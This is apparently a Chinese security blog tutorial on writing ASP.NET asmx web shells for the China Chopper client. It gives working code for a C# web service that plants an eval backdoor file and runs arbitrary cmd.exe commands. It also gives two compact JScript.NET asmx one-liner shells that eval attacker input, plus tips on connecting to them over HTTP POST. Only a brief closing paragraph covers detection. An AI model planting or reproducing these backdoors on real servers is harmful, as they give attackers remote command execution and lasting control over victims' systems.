0x01 前言

上篇介紹了一般處理程式（ashx）的工作原理以及實現一句話木馬的過程，今天接著介紹Web Service程式 （asmx）下的工作原理和如何實現一句話木馬，當然介紹之前筆者找到了一款asmx馬兒 https://github.com/tennc/webshell/blob/master/caidao-shell/customize.asmx ，依舊是一個大馬如下圖

這個還只是對客戶端的菜刀做了適配可用，暫時不符合一句話木馬的特點哈，至於要打造一款居家旅行必備的菜刀馬，還得從原理上搞清楚 asmx的運行過程。

0x02 簡介和原理

Web Service是一個基於可編程的web的應用程式，用於開發分散式的互操作的應用程式，也是一種web服務，Web Service的主要目標是跨平臺的可互操作性，為了實現這一目標Web Service 完全基於XML（可擴展標記語言）、XSD（XML Schema）等獨立於平臺、獨立於軟體供應商的標準，是創建可互操作的、分散式應用程式的新平臺。簡單的來說Web Service具備三個要素SOAP（Simple Object Access Protocol）、WSDL(WebServicesDescriptionLanguage)、UDDI(UniversalDescriptionDiscovery andIntegration)之一， SOAP用來描述傳遞信息的格式， WSDL 用來描述如何訪問具體的介面， UDDI用來管理，分發查詢webService ，也因此使用Web Service有許多優點，例如可以跨平臺工作、部署升級維護起來簡單方便、實現多數據多個服務的聚合使用等等。再結合下圖說明一下WebService工作的流程

無論使用什麼工具、語言編寫 WebService，都可以使用 SOAP 協議通過 HTTP 調用，創建 WebService 後，任何語言、平臺的客戶都可以閱讀 WSDL 文檔來調用 WebService ，同時客戶端也可以根據 WSDL 描述文檔生成一個 SOAP 請求信息併發送到Web伺服器，Web伺服器再將請求轉發給 WebService 請求處理器。

對於.Net而言，WebService請求處理器則是一個 .NET Framework 自帶的 ISAPI Extension。Web請求處理器用於解析收到的SOAP請求，調用 WebService，然後生成相應的SOAP應答。Web伺服器得到SOAP應答後，在通過HTTP應答的方式將其返回給客戶端，但WebService也支持HTTP POST請求，僅需要在服務端增加一項配置即可。

0x03 一句話的實現

3.1、WebMethod

在Web Service程式中，如果一個公共方法想被外界訪問調用的話，就需要加上WebMethod，加上[WebMethod]屬性的公有方法就可以被訪問，而沒有加這個屬性的方法就是不能被訪問的。將 WebMethod 屬性 (Attribute) 附加到 Public 方法表示希望將該方法公開為 XML Web services 的一部分，它具備6個屬性：Description 、EnableSession、MessageName、TransactionOption、CacheDuration、BufferResponse，為了更清晰的表述WebService請看下麵這段代碼

這裡聲明成一個字元串類型的公共方法HelloWorld，如果此時在方法體內實現創建aspx文件，保存內容為一句話小馬的話那麼這個WebService就變成了服務後門，依照這個推理就產生了C#版本的WebService小馬，實現了兩個功能，一個是創建文件，還有一個是執行CMD命令，核心代碼如下：

[System.ComponentModel.ToolboxItem(false)]
        [WebMethod]
        /**
        Create A BackDoor
        **/
        public string webShell()
        {
            StreamWriter wickedly = File.CreateText(HttpContext.Current.Server.MapPath("Ivan.aspx"));
            wickedly.Write("<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"Ivan\"],\"unsafe\");%>");
            wickedly.Flush();
            wickedly.Close();
            return "Wickedly";
        }
        [WebMethod]
        /**
        Exec Command via cmdShell 
       **/
        public string cmdShell(string input)
        {
            Process pr = new Process();
            pr.StartInfo.FileName = "cmd.exe";
            pr.StartInfo.RedirectStandardOutput = true;
            pr.StartInfo.UseShellExecute = false;
            pr.StartInfo.Arguments = "/c " + input;
            pr.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            pr.Start();
            StreamReader osr = pr.StandardOutput;
            String ocmd = osr.ReadToEnd();
            osr.Close();
            osr.Dispose();
            return ocmd;
        }

知道原理後就開始著手打造菜刀可用的一句話木馬，和一般處理程式類似通過Jscript.Net的eval方法去實現代碼執行，根據之前的介紹WebMethod有多個屬性並且根據微軟的官方文檔 https://docs.microsoft.com/zh-cn/previous-versions/dotnet/netframework-1.1/1tyazy68%28v%3dvs.80%29 可以得出Jscript.Net中可以使用 WebMethodAttribute 來替代[WebMethod]。

一句話實現的代碼如下：

<%@ WebService Language="JScript" class="asmxWebMethodSpy"%>
import System;
import System.Web;
import System.IO;
import System.Web.Services;
public class asmxWebMethodSpy extends WebService
{       
    WebMethodAttribute function Invoke(Ivan: String) : Void
    { 
	       var I = HttpContext.Current;
        var Request = I.Request;
        var Response = I.Response;
        var Server = I.Server;
	        Response.Write("<H1>Just for Research Learning, Do Not Abuse It! Written By <a href='https://github.com/Ivan1ee'>Ivan1ee</a></H1>");
        eval(Ivan); 
    } 
}

打開瀏覽器，測試效果如下

依照SOAP1.1的規範要求，發送請求的數據包就可以實現一句話代碼執行，筆者這裡還是拿當前的時間作為攻擊載荷，如下圖

3.2、ScriptMethod

在研究WebMethod的時候，發現VisualStudio有段註釋如下圖

當客戶端請求的方式是AJAX的時候會導入System.Web.Script.Services.ScriptService命名空間，筆者嘗試去挖掘一下可能存在的新的攻擊點

代碼里ResponseFormat表示方法要返回的類型，一般為Json或者XML; UseHttpGet等於true表示前臺的ajax是通過GET可以訪問此方法，如果前臺ajax通過POST，則報錯。

根據C#中的代碼可知需要配置WebMethod和ScriptMethod才能正常玩轉，而在Jscript.Net中實現這兩個功能的分類是WebMethodAttribute類和ScriptMethodAttribute類，最終寫出一句話木馬服務端代碼：

<%@ WebService Language="JScript" class="ScriptMethodSpy"%>
import System;
import System.Web;
import System.IO;
import System.Web.Services
import System.Web.Script.Services
public class ScriptMethodSpy extends WebService
{       
	WebMethodAttribute ScriptMethodAttribute function Invoke(Ivan : String) : Void
    { 
	        var I = HttpContext.Current;
        var Request = I.Request;
        var Response = I.Response;
        var Server = I.Server;
	Response.Write("<H1>Just for Research Learning, Do Not Abuse It! Written By <a href='https://github.com/Ivan1ee'>Ivan1ee</a></H1>");
        eval(Ivan); 
    } 
}

打開瀏覽器輸入 Response.Write(DateTime.Now) 成功列印出當前時間

可惜的是這種方法不支持.NET  2.0究其原因是using System.Web.Script.Services;這個命名空間並不在System.Web中，而是在ajax擴展中需要額外安裝ASP.NET 2.0 AJAX Extensions，所以在2.0的環境下儘量避免使用該方法。

0X04 菜刀連接

菜刀不支持SOAP的方式提交payload，直接連接asmx文件就會出現下圖錯誤

第一種解決方法可以自己寫代碼實現支持SOAP的客戶端，第二種辦法參考asmx頁面最下方給出的HTTP POST提交方式

本地環境下用菜刀連接沒問題，可以正常連接

但通常部署到伺服器上可能會遇到下麵的提示

多數情況下程式開發者會支持HTTP POST請求，所以對此不必過於擔心。還有就是基於優化考慮將asmxWebMethodSpy.asmx進一步壓縮體積後只有499個位元組，asmxScriptMethodSpy.asmx也只有547個位元組。

0x05 防禦措施

通過菜刀連接的方式，添加可以檢測菜刀關鍵特征的規則；對於Web應用來說，儘量保證代碼的安全性；對於IDS規則層面來說，上傳的時候可以加入WebMethodAttribute等關鍵詞的檢測

0x06 小結

 還有本文提供了兩種方式實現asmx一句話的思路，當然還有更多編寫一句話的技巧有待發掘，下次將介紹另外一種姿勢，敬請期待；文章的代碼片段請參考 https://github.com/Ivan1ee ；

0x07 參考鏈接

 https://docs.microsoft.com/zh-cn/previous-versions/dotnet/netframework-1.1/1tyazy68%28v%3dvs.80%29

https://github.com/tennc/webshell/blob/master/caidao-shell/customize.asmx

https://www.cnblogs.com/bpdwn/p/3479421.html

https://github.com/Ivan1ee